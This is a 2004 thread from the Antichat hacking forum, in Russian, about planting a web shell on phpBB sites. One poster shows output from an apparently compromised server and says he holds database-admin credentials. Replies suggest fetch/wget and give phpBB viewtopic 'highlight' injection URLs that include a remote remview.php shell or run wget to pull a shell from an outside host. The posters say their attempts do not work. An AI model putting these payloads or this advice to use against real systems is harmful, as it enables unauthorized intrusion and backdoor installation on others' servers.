ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как залить шелл через PhPBB
  #1  
Старый 24.11.2004, 03:00
Аватар для SheFF
SheFF
Новичок
Регистрация: 15.11.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
Отправить сообщение для SheFF с помощью ICQ
По умолчанию Как залить шелл через PhPBB

Народ здрасти всем! Может всётаки раскажите от и до как же всётаки залить шелл на phpbb
Что то я так и немогу допереть.
НУ вот например что у меня получилоьс


uid=1001(www3) gid=4294967295 FreeBSD main.ntline.local 4.9-RELEASE-p11 FreeBSD 4.9-RELEASE-p11 #0: Tue Aug 3 11:32:37 EEST 2004 scruff@main.ntline.local:/usr/src/sys/compile/main i386 total 760 drwxr-xr-x 2 www3 www3 1024 May 30 00:40 admin drwxr-xr-x 2 www3 www3 512 May 30 00:40 cache -rwxr--r-- 1 www3 www3 5051 Jul 20 2003 common.php -rwxr--r-- 1 www3 www3 267 Nov 23 18:27 config.php drwxr-xr-x 2 www3 www3 512 May 30 00:40 db drwxr-xr-x 2 www3 www3 512 May 30 00:40 docs -rwxr--r-- 1 www3 www3 810 Jul 20 2003 extension.inc -rwxr--r-- 1 www3 www3 3596 Jul 20 2003 faq.php -rwxr--r-- 1 www3 www3 45540 Dec 30 2003 groupcp.php drwxr-xr-x 4 www3 www3 512 May 30 00:40 images drwxr-xr-x 2 www3 www3 1024 May 30 00:40 includes -rwxr--r-- 1 www3 www3 14332 Jul 20 2003 index.php drwxr-xr-x 3 www3 www3 512 May 30 00:40 language -rwxr--r-- 1 www3 www3 6864 Jul 20 2003 login.php -rwxr--r-- 1 www3 www3 12102 Jul 20 2003 memberlist.php -rwxr--r-- 1 www3 www3 37609 Jul 26 2003 modcp.php -rwxr--r-- 1 www3 www3 34208 Jul 20 2003 posting.php -rwxr--r-- 1 www3 www3 72513 Dec 30 2003 privmsg.php -rwxr--r-- 1 www3 www3 3719 Jul 20 2003 profile.php -rwxr--r-- 1 www3 www3 42402 Nov 24 2003 search.php drwxr-xr-x 3 www3 www3 512 May 30 00:40 templates -rwxr--r-- 1 www3 www3 23138 Jul 20 2003 viewforum.php -rwxr--r-- 1 www3 www3 7232 Jul 20 2003 viewonline.php -rwxr--r-- 1 www3 www3 45009 Jul 20 2003 viewtopic.php drwxr-xr-x 2 www3 www3 512 May 30 00:40 zcontrib drwxr-xr-x 3 www3 www3 512 May 30 00:40 zinstall )\b#i

ну а также есть логин и пароль к пхпмойадмин. Но мля не мемогу найти путь к пхпмойадмин чтобы войти суда. Да мне впринцепе туда и ненадо покамись. мне бы на фтп попасть.
Очнь сильно прошу расказать метод как заливать Шелл.

Последний раз редактировалось SheFF; 24.11.2004 в 03:03..
 
Ответить с цитированием

  #2  
Старый 24.11.2004, 16:36
Аватар для x000d
x000d
Новичок
Регистрация: 16.11.2004
Сообщений: 8
Провел на форуме:
0

Репутация: 0
Отправить сообщение для x000d с помощью ICQ
По умолчанию

для того чтобы шелл залить используй команды fetch , wget взависимости от того какая сис-ма.
 
Ответить с цитированием

  #3  
Старый 24.11.2004, 23:50
Аватар для SheFF
SheFF
Новичок
Регистрация: 15.11.2004
Сообщений: 3
Провел на форуме:
0

Репутация: 0
Отправить сообщение для SheFF с помощью ICQ
По умолчанию

Где лю этих командах можно почитать чайнику?
 
Ответить с цитированием

  #4  
Старый 28.11.2004, 09:01
Аватар для PEPSICOLA
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

Гыыыы.. .я тоже чё то не нашёл Хотел найти ответ типа на этот вопрос.
Тока немного подругому...
Допустим у меня есть dbname, dbuser, dbhost, dbpasswd...
Как писать команду что бы залить remview?
Допустим RemView сейчас находиться на сайте...
http://123.123.123.123/remview.php

То получается мне надо залить его так?:

http://[Target]/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527

Правильно? нЭ?
 
Ответить с цитированием

  #5  
Старый 29.11.2004, 00:05
Аватар для Dainur
Dainur
Новичок
Регистрация: 29.11.2004
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

А как потом к Post Reply обратиться?(как его запустить)
 
Ответить с цитированием

  #6  
Старый 29.11.2004, 01:25
Аватар для PEPSICOLA
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

Вот там в двух коментариях написано одно и тоже.

Залить шел
viewtopic.php?p=123&highlight=%2527.$poster=
%20wget%20-O%20 имя шела %20http://шел .php %60.%2527

(c)Unnamed =)

Я пробовал - тож не получается.
Dainur, а зачем к Post Reply обратиться? Он поидее должен заливаться либо в директорию forum/ либо фиг знает куды =)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ